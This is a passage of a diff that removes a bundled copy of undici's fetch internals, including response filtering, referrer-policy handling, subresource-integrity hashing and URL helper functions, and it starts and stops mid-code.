: new Error(reason ? String(reason) : reason), - aborted: reason && reason.name === 'AbortError' - }) -} - -function makeFilteredResponse (response, state) { - state = { - internalResponse: response, - ...state - } - - return new Proxy(response, { - get (target, p) { - return p in state ? state[p] : target[p] - }, - set (target, p, value) { - assert(!(p in state)) - target[p] = value - return true - } - }) -} - -// https://fetch.spec.whatwg.org/#concept-filtered-response -function filterResponse (response, type) { - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (type === 'basic') { - // A basic filtered response is a filtered response whose type is "basic" - // and header list excludes any headers in internal response’s header list - // whose name is a forbidden response-header name. - - // Note: undici does not implement forbidden response-header names - return makeFilteredResponse(response, { - type: 'basic', - headersList: response.headersList - }) - } else if (type === 'cors') { - // A CORS filtered response is a filtered response whose type is "cors" - // and header list excludes any headers in internal response’s header - // list whose name is not a CORS-safelisted response-header name, given - // internal response’s CORS-exposed header-name list. - - // Note: undici does not implement CORS-safelisted response-header names - return makeFilteredResponse(response, { - type: 'cors', - headersList: response.headersList - }) - } else if (type === 'opaque') { - // An opaque filtered response is a filtered response whose type is - // "opaque", URL list is the empty list, status is 0, status message - // is the empty byte sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaque', - urlList: Object.freeze([]), - status: 0, - statusText: '', - body: null - }) - } else if (type === 'opaqueredirect') { - // An opaque-redirect filtered response is a filtered response whose type - // is "opaqueredirect", status is 0, status message is the empty byte - // sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaqueredirect', - status: 0, - statusText: '', - headersList: [], - body: null - }) - } else { - assert(false) - } -} - -// https://fetch.spec.whatwg.org/#appropriate-network-error -function makeAppropriateNetworkError (fetchParams, err = null) { - // 1. Assert: fetchParams is canceled. - assert(isCancelled(fetchParams)) - - // 2. Return an aborted network error if fetchParams is aborted; - // otherwise return a network error. - return isAborted(fetchParams) - ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) - : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) -} - -// https://whatpr.org/fetch/1392.html#initialize-a-response -function initializeResponse (response, init, body) { - // 1. If init["status"] is not in the range 200 to 599, inclusive, then - // throw a RangeError. - if (init.status !== null && (init.status < 200 || init.status > 599)) { - throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') - } - - // 2. If init["statusText"] does not match the reason-phrase token production, - // then throw a TypeError. - if ('statusText' in init && init.statusText != null) { - // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: - // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) - if (!isValidReasonPhrase(String(init.statusText))) { - throw new TypeError('Invalid statusText') - } - } - - // 3. Set response’s response’s status to init["status"]. - if ('status' in init && init.status != null) { - response[kState].status = init.status - } - - // 4. Set response’s response’s status message to init["statusText"]. - if ('statusText' in init && init.statusText != null) { - response[kState].statusText = init.statusText - } - - // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. - if ('headers' in init && init.headers != null) { - fill(response[kHeaders], init.headers) - } - - // 6. If body was given, then: - if (body) { - // 1. If response's status is a null body status, then throw a TypeError. - if (nullBodyStatus.includes(response.status)) { - throw webidl.errors.exception({ - header: 'Response constructor', - message: 'Invalid response status code ' + response.status - }) - } - - // 2. Set response's body to body's body. - response[kState].body = body.body - - // 3. If body's type is non-null and response's header list does not contain - // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. - if (body.type != null && !response[kState].headersList.contains('Content-Type')) { - response[kState].headersList.append('content-type', body.type) - } - } -} - -webidl.converters.ReadableStream = webidl.interfaceConverter( - ReadableStream -) - -webidl.converters.FormData = webidl.interfaceConverter( - FormData -) - -webidl.converters.URLSearchParams = webidl.interfaceConverter( - URLSearchParams -) - -// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit -webidl.converters.XMLHttpRequestBodyInit = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { - return webidl.converters.BufferSource(V) - } - - if (util.isFormDataLike(V)) { - return webidl.converters.FormData(V, { strict: false }) - } - - if (V instanceof URLSearchParams) { - return webidl.converters.URLSearchParams(V) - } - - return webidl.converters.DOMString(V) -} - -// https://fetch.spec.whatwg.org/#bodyinit -webidl.converters.BodyInit = function (V) { - if (V instanceof ReadableStream) { - return webidl.converters.ReadableStream(V) - } - - // Note: the spec doesn't include async iterables, - // this is an undici extension. - if (V?.[Symbol.asyncIterator]) { - return V - } - - return webidl.converters.XMLHttpRequestBodyInit(V) -} - -webidl.converters.ResponseInit = webidl.dictionaryConverter([ - { - key: 'status', - converter: webidl.converters['unsigned short'], - defaultValue: 200 - }, - { - key: 'statusText', - converter: webidl.converters.ByteString, - defaultValue: '' - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - } -]) - -module.exports = { - makeNetworkError, - makeResponse, - makeAppropriateNetworkError, - filterResponse, - Response, - cloneResponse -} - - -/***/ }), - -/***/ 5861: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kUrl: Symbol('url'), - kHeaders: Symbol('headers'), - kSignal: Symbol('signal'), - kState: Symbol('state'), - kGuard: Symbol('guard'), - kRealm: Symbol('realm') -} - - -/***/ }), - -/***/ 2538: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { performance } = __nccwpck_require__(4074) -const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) -const assert = __nccwpck_require__(9491) -const { isUint8Array } = __nccwpck_require__(9830) - -// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable -/** @type {import('crypto')|undefined} */ -let crypto - -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -function responseURL (response) { - // https://fetch.spec.whatwg.org/#responses - // A response has an associated URL. It is a pointer to the last URL - // in response’s URL list and null if response’s URL list is empty. - const urlList = response.urlList - const length = urlList.length - return length === 0 ? null : urlList[length - 1].toString() -} - -// https://fetch.spec.whatwg.org/#concept-response-location-url -function responseLocationURL (response, requestFragment) { - // 1. If response’s status is not a redirect status, then return null. - if (!redirectStatusSet.has(response.status)) { - return null - } - - // 2. Let location be the result of extracting header list values given - // `Location` and response’s header list. - let location = response.headersList.get('location') - - // 3. If location is a header value, then set location to the result of - // parsing location with response’s URL. - if (location !== null && isValidHeaderValue(location)) { - location = new URL(location, responseURL(response)) - } - - // 4. If location is a URL whose fragment is null, then set location’s - // fragment to requestFragment. - if (location && !location.hash) { - location.hash = requestFragment - } - - // 5. Return location. - return location -} - -/** @returns {URL} */ -function requestCurrentURL (request) { - return request.urlList[request.urlList.length - 1] -} - -function requestBadPort (request) { - // 1. Let url be request’s current URL. - const url = requestCurrentURL(request) - - // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, - // then return blocked. - if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { - return 'blocked' - } - - // 3. Return allowed. - return 'allowed' -} - -function isErrorLike (object) { - return object instanceof Error || ( - object?.constructor?.name === 'Error' || - object?.constructor?.name === 'DOMException' - ) -} - -// Check whether |statusText| is a ByteString and -// matches the Reason-Phrase token production. -// RFC 2616: https://tools.ietf.org/html/rfc2616 -// RFC 7230: https://tools.ietf.org/html/rfc7230 -// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" -// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 -function isValidReasonPhrase (statusText) { - for (let i = 0; i < statusText.length; ++i) { - const c = statusText.charCodeAt(i) - if ( - !( - ( - c === 0x09 || // HTAB - (c >= 0x20 && c <= 0x7e) || // SP / VCHAR - (c >= 0x80 && c <= 0xff) - ) // obs-text - ) - ) { - return false - } - } - return true -} - -/** - * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 - * @param {number} c - */ -function isTokenCharCode (c) { - switch (c) { - case 0x22: - case 0x28: - case 0x29: - case 0x2c: - case 0x2f: - case 0x3a: - case 0x3b: - case 0x3c: - case 0x3d: - case 0x3e: - case 0x3f: - case 0x40: - case 0x5b: - case 0x5c: - case 0x5d: - case 0x7b: - case 0x7d: - // DQUOTE and "(),/:;<=>?@[\]{}" - return false - default: - // VCHAR %x21-7E - return c >= 0x21 && c <= 0x7e - } -} - -/** - * @param {string} characters - */ -function isValidHTTPToken (characters) { - if (characters.length === 0) { - return false - } - for (let i = 0; i < characters.length; ++i) { - if (!isTokenCharCode(characters.charCodeAt(i))) { - return false - } - } - return true -} - -/** - * @see https://fetch.spec.whatwg.org/#header-name - * @param {string} potentialValue - */ -function isValidHeaderName (potentialValue) { - return isValidHTTPToken(potentialValue) -} - -/** - * @see https://fetch.spec.whatwg.org/#header-value - * @param {string} potentialValue - */ -function isValidHeaderValue (potentialValue) { - // - Has no leading or trailing HTTP tab or space bytes. - // - Contains no 0x00 (NUL) or HTTP newline bytes. - if ( - potentialValue.startsWith('\t') || - potentialValue.startsWith(' ') || - potentialValue.endsWith('\t') || - potentialValue.endsWith(' ') - ) { - return false - } - - if ( - potentialValue.includes('\0') || - potentialValue.includes('\r') || - potentialValue.includes('\n') - ) { - return false - } - - return true -} - -// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect -function setRequestReferrerPolicyOnRedirect (request, actualResponse) { - // Given a request request and a response actualResponse, this algorithm - // updates request’s referrer policy according to the Referrer-Policy - // header (if any) in actualResponse. - - // 1. Let policy be the result of executing § 8.1 Parse a referrer policy - // from a Referrer-Policy header on actualResponse. - - // 8.1 Parse a referrer policy from a Referrer-Policy header - // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. - const { headersList } = actualResponse - // 2. Let policy be the empty string. - // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. - // 4. Return policy. - const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') - - // Note: As the referrer-policy can contain multiple policies - // separated by comma, we need to loop through all of them - // and pick the first valid one. - // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy - let policy = '' - if (policyHeader.length > 0) { - // The right-most policy takes precedence. - // The left-most policy is the fallback. - for (let i = policyHeader.length; i !== 0; i--) { - const token = policyHeader[i - 1].trim() - if (referrerPolicyTokens.has(token)) { - policy = token - break - } - } - } - - // 2. If policy is not the empty string, then set request’s referrer policy to policy. - if (policy !== '') { - request.referrerPolicy = policy - } -} - -// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check -function crossOriginResourcePolicyCheck () { - // TODO - return 'allowed' -} - -// https://fetch.spec.whatwg.org/#concept-cors-check -function corsCheck () { - // TODO - return 'success' -} - -// https://fetch.spec.whatwg.org/#concept-tao-check -function TAOCheck () { - // TODO - return 'success' -} - -function appendFetchMetadata (httpRequest) { - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header - - // 1. Assert: r’s url is a potentially trustworthy URL. - // TODO - - // 2. Let header be a Structured Header whose value is a token. - let header = null - - // 3. Set header’s value to r’s mode. - header = httpRequest.mode - - // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. - httpRequest.headersList.set('sec-fetch-mode', header) - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header - // TODO -} - -// https://fetch.spec.whatwg.org/#append-a-request-origin-header -function appendRequestOriginHeader (request) { - // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. - let serializedOrigin = request.origin - - // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. - if (request.responseTainting === 'cors' || request.mode === 'websocket') { - if (serializedOrigin) { - request.headersList.append('origin', serializedOrigin) - } - - // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: - } else if (request.method !== 'GET' && request.method !== 'HEAD') { - // 1. Switch on request’s referrer policy: - switch (request.referrerPolicy) { - case 'no-referrer': - // Set serializedOrigin to `null`. - serializedOrigin = null - break - case 'no-referrer-when-downgrade': - case 'strict-origin': - case 'strict-origin-when-cross-origin': - // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. - if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { - serializedOrigin = null - } - break - case 'same-origin': - // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. - if (!sameOrigin(request, requestCurrentURL(request))) { - serializedOrigin = null - } - break - default: - // Do nothing. - } - - if (serializedOrigin) { - // 2. Append (`Origin`, serializedOrigin) to request’s header list. - request.headersList.append('origin', serializedOrigin) - } - } -} - -function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { - // TODO - return performance.now() -} - -// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info -function createOpaqueTimingInfo (timingInfo) { - return { - startTime: timingInfo.startTime ?? 0, - redirectStartTime: 0, - redirectEndTime: 0, - postRedirectStartTime: timingInfo.startTime ?? 0, - finalServiceWorkerStartTime: 0, - finalNetworkResponseStartTime: 0, - finalNetworkRequestStartTime: 0, - endTime: 0, - encodedBodySize: 0, - decodedBodySize: 0, - finalConnectionTimingInfo: null - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#policy-container -function makePolicyContainer () { - // Note: the fetch spec doesn't make use of embedder policy or CSP list - return { - referrerPolicy: 'strict-origin-when-cross-origin' - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container -function clonePolicyContainer (policyContainer) { - return { - referrerPolicy: policyContainer.referrerPolicy - } -} - -// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer -function determineRequestsReferrer (request) { - // 1. Let policy be request's referrer policy. - const policy = request.referrerPolicy - - // Note: policy cannot (shouldn't) be null or an empty string. - assert(policy) - - // 2. Let environment be request’s client. - - let referrerSource = null - - // 3. Switch on request’s referrer: - if (request.referrer === 'client') { - // Note: node isn't a browser and doesn't implement document/iframes, - // so we bypass this step and replace it with our own. - - const globalOrigin = getGlobalOrigin() - - if (!globalOrigin || globalOrigin.origin === 'null') { - return 'no-referrer' - } - - // note: we need to clone it as it's mutated - referrerSource = new URL(globalOrigin) - } else if (request.referrer instanceof URL) { - // Let referrerSource be request’s referrer. - referrerSource = request.referrer - } - - // 4. Let request’s referrerURL be the result of stripping referrerSource for - // use as a referrer. - let referrerURL = stripURLForReferrer(referrerSource) - - // 5. Let referrerOrigin be the result of stripping referrerSource for use as - // a referrer, with the origin-only flag set to true. - const referrerOrigin = stripURLForReferrer(referrerSource, true) - - // 6. If the result of serializing referrerURL is a string whose length is - // greater than 4096, set referrerURL to referrerOrigin. - if (referrerURL.toString().length > 4096) { - referrerURL = referrerOrigin - } - - const areSameOrigin = sameOrigin(request, referrerURL) - const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && - !isURLPotentiallyTrustworthy(request.url) - - // 8. Execute the switch statements corresponding to the value of policy: - switch (policy) { - case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) - case 'unsafe-url': return referrerURL - case 'same-origin': - return areSameOrigin ? referrerOrigin : 'no-referrer' - case 'origin-when-cross-origin': - return areSameOrigin ? referrerURL : referrerOrigin - case 'strict-origin-when-cross-origin': { - const currentURL = requestCurrentURL(request) - - // 1. If the origin of referrerURL and the origin of request’s current - // URL are the same, then return referrerURL. - if (sameOrigin(referrerURL, currentURL)) { - return referrerURL - } - - // 2. If referrerURL is a potentially trustworthy URL and request’s - // current URL is not a potentially trustworthy URL, then return no - // referrer. - if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { - return 'no-referrer' - } - - // 3. Return referrerOrigin. - return referrerOrigin - } - case 'strict-origin': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - case 'no-referrer-when-downgrade': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - - default: // eslint-disable-line - return isNonPotentiallyTrustWorthy ? 'no-referrer' : referrerOrigin - } -} - -/** - * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url - * @param {URL} url - * @param {boolean|undefined} originOnly - */ -function stripURLForReferrer (url, originOnly) { - // 1. Assert: url is a URL. - assert(url instanceof URL) - - // 2. If url’s scheme is a local scheme, then return no referrer. - if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { - return 'no-referrer' - } - - // 3. Set url’s username to the empty string. - url.username = '' - - // 4. Set url’s password to the empty string. - url.password = '' - - // 5. Set url’s fragment to null. - url.hash = '' - - // 6. If the origin-only flag is true, then: - if (originOnly) { - // 1. Set url’s path to « the empty string ». - url.pathname = '' - - // 2. Set url’s query to null. - url.search = '' - } - - // 7. Return url. - return url -} - -function isURLPotentiallyTrustworthy (url) { - if (!(url instanceof URL)) { - return false - } - - // If child of about, return true - if (url.href === 'about:blank' || url.href === 'about:srcdoc') { - return true - } - - // If scheme is data, return true - if (url.protocol === 'data:') return true - - // If file, return true - if (url.protocol === 'file:') return true - - return isOriginPotentiallyTrustworthy(url.origin) - - function isOriginPotentiallyTrustworthy (origin) { - // If origin is explicitly null, return false - if (origin == null || origin === 'null') return false - - const originAsURL = new URL(origin) - - // If secure, return true - if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { - return true - } - - // If localhost or variants, return true - if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || - (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || - (originAsURL.hostname.endsWith('.localhost'))) { - return true - } - - // If any other, return false - return false - } -} - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist - * @param {Uint8Array} bytes - * @param {string} metadataList - */ -function bytesMatch (bytes, metadataList) { - // If node is not built with OpenSSL support, we cannot check - // a request's integrity, so allow it by default (the spec will - // allow requests if an invalid hash is given, as precedence). - /* istanbul ignore if: only if node is built with --without-ssl */ - if (crypto === undefined) { - return true - } - - // 1. Let parsedMetadata be the result of parsing metadataList. - const parsedMetadata = parseMetadata(metadataList) - - // 2. If parsedMetadata is no metadata, return true. - if (parsedMetadata === 'no metadata') { - return true - } - - // 3. If parsedMetadata is the empty set, return true. - if (parsedMetadata.length === 0) { - return true - } - - // 4. Let metadata be the result of getting the strongest - // metadata from parsedMetadata. - const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) - // get the strongest algorithm - const strongest = list[0].algo - // get all entries that use the strongest algorithm; ignore weaker - const metadata = list.filter((item) => item.algo === strongest) - - // 5. For each item in metadata: - for (const item of metadata) { - // 1. Let algorithm be the alg component of item. - const algorithm = item.algo - - // 2. Let expectedValue be the val component of item. - let expectedValue = item.hash - - // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e - // "be liberal with padding". This is annoying, and it's not even in the spec. - - if (expectedValue.endsWith('==')) { - expectedValue = expectedValue.slice(0, -2) - } - - // 3. Let actualValue be the result of applying algorithm to bytes. - let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') - - if (actualValue.endsWith('==')) { - actualValue = actualValue.slice(0, -2) - } - - // 4. If actualValue is a case-sensitive match for expectedValue, - // return true. - if (actualValue === expectedValue) { - return true - } - - let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') - - if (actualBase64URL.endsWith('==')) { - actualBase64URL = actualBase64URL.slice(0, -2) - } - - if (actualBase64URL === expectedValue) { - return true - } - } - - // 6. Return false. - return false -} - -// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options -// https://www.w3.org/TR/CSP2/#source-list-syntax -// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 -const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata - * @param {string} metadata - */ -function parseMetadata (metadata) { - // 1. Let result be the empty set. - /** @type {{ algo: string, hash: string }[]} */ - const result = [] - - // 2. Let empty be equal to true. - let empty = true - - const supportedHashes = crypto.getHashes() - - // 3. For each token returned by splitting metadata on spaces: - for (const token of metadata.split(' ')) { - // 1. Set empty to false. - empty = false - - // 2. Parse token as a hash-with-options. - const parsedToken = parseHashWithOptions.exec(token) - - // 3. If token does not parse, continue to the next token. - if (parsedToken === null || parsedToken.groups === undefined) { - // Note: Chromium blocks the request at this point, but Firefox - // gives a warning that an invalid integrity was given. The - // correct behavior is to ignore these, and subsequently not - // check the integrity of the resource. - continue - } - - // 4. Let algorithm be the hash-algo component of token. - const algorithm = parsedToken.groups.algo - - // 5. If algorithm is a hash function recognized by the user - // agent, add the parsed token to result. - if (supportedHashes.includes(algorithm.toLowerCase())) { - result.push(parsedToken.groups) - } - } - - // 4. Return no metadata if empty is true, otherwise return result. - if (empty === true) { - return 'no metadata' - } - - return result -} - -// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request -function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { - // TODO -} - -/** - * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} - * @param {URL} A - * @param {URL} B - */ -function sameOrigin (A, B) { - // 1. If A and B are the same opaque origin, then return true. - if (A.origin === B.origin && A.origin === 'null') { - return true - } - - // 2. If A and B are both tuple origins and their schemes, - // hosts, and port are identical, then return true. - if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { - return true - } - - // 3. Return false. - return false -} - -function createDeferredPromise () { - let res - let rej - const promise = new Promise((resolve, reject) => { - res = resolve - rej = reject - }) - - return { promise, resolve: res, reject: rej } -} - -function isAborted (fetchParams) { - return fetchParams.controller.state === 'aborted' -} - -function isCancelled (fetchParams) { - return fetchParams.controller.state === 'aborted' || - fetchParams.controller.state === 'terminated' -} - -const normalizeMethodRecord = { - delete: 'DELETE', - DELETE: 'DELETE', - get: 'GET', - GET: 'GET', - head: 'HEAD', - HEAD: 'HEAD', - options: 'OPTIONS', - OPTIONS: 'OPTIONS', - post: 'POST', - POST: 'POST', - put: 'PUT', - PUT: 'PUT' -} - -// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. -Object.setPrototypeOf(normalizeMethodRecord, null) - -/** - * @see https://fetch.spec.whatwg.org/#concept-method-normalize - * @param {string} method - */ -function normalizeMethod (method) { - return normalizeMethodRecord[method.toLowerCase()] ?? method -} - -// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string -function serializeJavascriptValueToJSONString (value) { - // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). - const result = JSON.stringify(value) - - // 2. If result is undefined, then throw a TypeError. - if (result === undefined) { - throw new TypeError('Value is not JSON serializable') - } - - // 3. Assert: result is a string. - assert(typeof result === 'string') - - // 4. Return result. - return result -} - -// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object -const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) - -/** - * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object - * @param {() => unknown[]} iterator - * @param {string} name name of the instance - * @param {'key'|'value'|'key+value'} kind - */ -function makeIterator (iterator, name, kind) { - const object = { - index: 0, - kind, - target: iterator - } - - const i = { - next () { - // 1. Let interface be the interface for which the iterator prototype object exists. - - // 2. Let thisValue be the this value. - - // 3. Let object be ? ToObject(thisValue). - - // 4. If object is a platform object, then perform a security - // check, passing: - - // 5. If object is not a default iterator object for interface, - // then throw a TypeError. - if (Object.getPrototypeOf(this) !== i) { - throw new TypeError( - `'next' called on an object that does not implement interface ${name} Iterator.` - ) - } - - // 6. Let index be object’s index. - // 7. Let kind be object’s kind. - // 8. Let values be object’s target's value pairs to iterate over. - const { index, kind, target } = object - const values = target() - - // 9. Let len be the length of values. - const len = values.length - - // 10. If index is greater than or equal to len, then return - // CreateIterResultObject(undefined, true). - if (index >= len) { - return { value: undefined, done: true } - } - - // 11. Let pair be the entry in values at index index. - const pair = values[index] - - // 12. Set object’s index to index + 1. - object.index = index + 1 - - // 13. Return the iterator result for pair and kind. - return iteratorResult(pair, kind) - }, - // The class string of an iterator prototype object for a given interface is the - // result of concatenating the identifier of the interface and the string " Iterator". - [Symbol.toStringTag]: `${name} Iterator` - } - - // The [[Prototype]] internal slot of an iterator prototype object must be %IteratorPrototype%. - Object.setPrototypeOf(i, esIteratorPrototype) - // esIteratorPrototype needs to be the prototype of i - // which is the prototype of an empty object. Yes, it's confusing. - return Object.setPrototypeOf({}, i) -} - -// https://webidl.spec.whatwg.org/#iterator-result -function iteratorResult (pair, kind) { - let result - - // 1. Let result be a value determined by the value of kind: - switch (kind) { - case 'key': { - // 1. Let idlKey be pair’s key. - // 2. Let key be the result of converting idlKey to an - // ECMAScript value. - // 3. result is key. - result = pair[0] - break - } - case 'value': { - // 1. Let idlValue be pair’s value. - // 2. Let value be the result of converting idlValue to - // an ECMAScript value. - // 3. result is value. - result = pair[1] - break - } - case 'key+value': { - // 1. Let idlKey be pair’s key. - // 2. Let idlValue be pair’s value. - // 3. Let key be the result of converting idlKey to an - // ECMAScript value. - // 4. Let value be the result of converting idlValue to - // an ECMAScript value. - // 5. Let array be ! ArrayCreate(2). - // 6. Call ! CreateDataProperty(array, "0", key). - // 7. Call ! CreateDataProperty(array, "1", value). - // 8. result is array. - result = pair - break - } - } - - // 2. Return CreateIterResultObject(result, false). - return { value: result, done: false } -} - -/** - * @see https://fetch.spec.whatwg.org/#body-fully-read - */ -async function fullyReadBody (body, processBody, processBodyError) { - // 1. If taskDestination is null, then set taskDestination to - // the result of starting a new parallel queue. - - // 2. Let successSteps given a byte sequence bytes be to queue a - // fetch task to run processBody given bytes, with taskDestination. - const successSteps = processBody - - // 3. Let errorSteps be to queue a fetch task to run processBodyError, - // with taskDestination. - const errorSteps = processBodyError - - // 4. Let reader be the result of getting a reader for body’s stream. - // If that threw an exception, then run errorSteps with that - // exception and return. - let reader - - try { - reader = body.stream.getReader() - } catch (e) { - errorSteps(e) - return - } - - // 5. Read all bytes from reader, given successSteps and errorSteps. - try { - const result = await readAllBytes(reader) - successSteps(result) - } catch (e) { - errorSteps(e) - } -} - -/** @type {ReadableStream} */ -let ReadableStream = globalThis.ReadableStream - -function isReadableStreamLike (stream) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - return stream instanceof ReadableStream || ( - stream[Symbol.toStringTag] === 'ReadableStream' && - typeof stream.tee === 'function' - ) -} - -const MAXIMUM_ARGUMENT_LENGTH = 65535 - -/** - * @see https://infra.spec.whatwg.org/#isomorphic-decode - * @param {number[]|Uint8Array} input - */ -function isomorphicDecode (input) { - // 1. To isomorphic decode a byte sequence input, return a string whose code point - // length is equal to input’s length and whose code points have the same values - // as the values of input’s bytes, in the same order. - - if (input.length < MAXIMUM_ARGUMENT_LENGTH) { - return String.fromCharCode(...input) - } - - return input.reduce((previous, current) => previous + String.fromCharCode(current), '') -} - -/** - * @param {ReadableStreamController} controller - */ -function readableStreamClose (controller) { - try { - controller.close() - } catch (err) { - // TODO: add comment explaining why this error occurs. - if (!err.message.includes('Controller is already closed')) { - throw err - } - } -} - -/** - * @see https://infra.spec.whatwg.org/#isomorphic-encode - * @param {string} input - */ -function isomorphicEncode (input) { - // 1. Assert: input contains no code points greater than U+00FF. - for (let i = 0; i < input.length; i++) { - assert(input.charCodeAt(i) <= 0xFF) - } - - // 2. Return a byte sequence whose length is equal to input’s code - // point length and whose bytes have the same values as the - // values of input’s code points, in the same order - return input -} - -/** - * @see https://streams.spec.whatwg.org/#readablestreamdefaultreader-read-all-bytes - * @see https://streams.spec.whatwg.org/#read-loop - * @param {ReadableStreamDefaultReader} reader - */ -async function readAllBytes (reader) { - const bytes = [] - let byteLength = 0 - - while (true) { - const { done, value: chunk } = await reader.read() - - if (done) { - // 1. Call successSteps with bytes. - return Buffer.concat(bytes, byteLength) - } - - // 1. If chunk is not a Uint8Array object, call failureSteps - // with a TypeError and abort these steps. - if (!isUint8Array(chunk)) { - throw new TypeError('Received non-Uint8Array chunk') - } - - // 2. Append the bytes represented by chunk to bytes. - bytes.push(chunk) - byteLength += chunk.length - - // 3. Read-loop given reader, bytes, successSteps, and failureSteps. - } -} - -/** - * @see https://fetch.spec.whatwg.org/#is-local - * @param {URL} url - */ -function urlIsLocal (url) { - assert('protocol' in url) // ensure it's a url object - - const protocol = url.protocol - - return protocol === 'about:' || protocol === 'blob:' || protocol === 'data:' -} - -/** - * @param {string|URL} url - */ -function urlHasHttpsScheme (url) { - if (typeof url === 'string') { - return url.startsWith('https:') - } - - return url.protocol === 'https:' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-scheme - * @param {URL} url - */ -function urlIsHttpHttpsScheme (url) { - assert('protocol' in url) // ensure it's a url object - - const protocol = url.protocol - - return protocol === 'http:' || protocol === 'https:' -} - -/** - * Fetch supports node >= 16.8.0, but Object.hasOwn was added in v16.9.0. - */ -const hasOwn = Object.hasOwn || ((dict, key) => Object.prototype.hasOwnProperty.call(dict, key)) - -module.exports = { - isAborted, - isCancelled, - 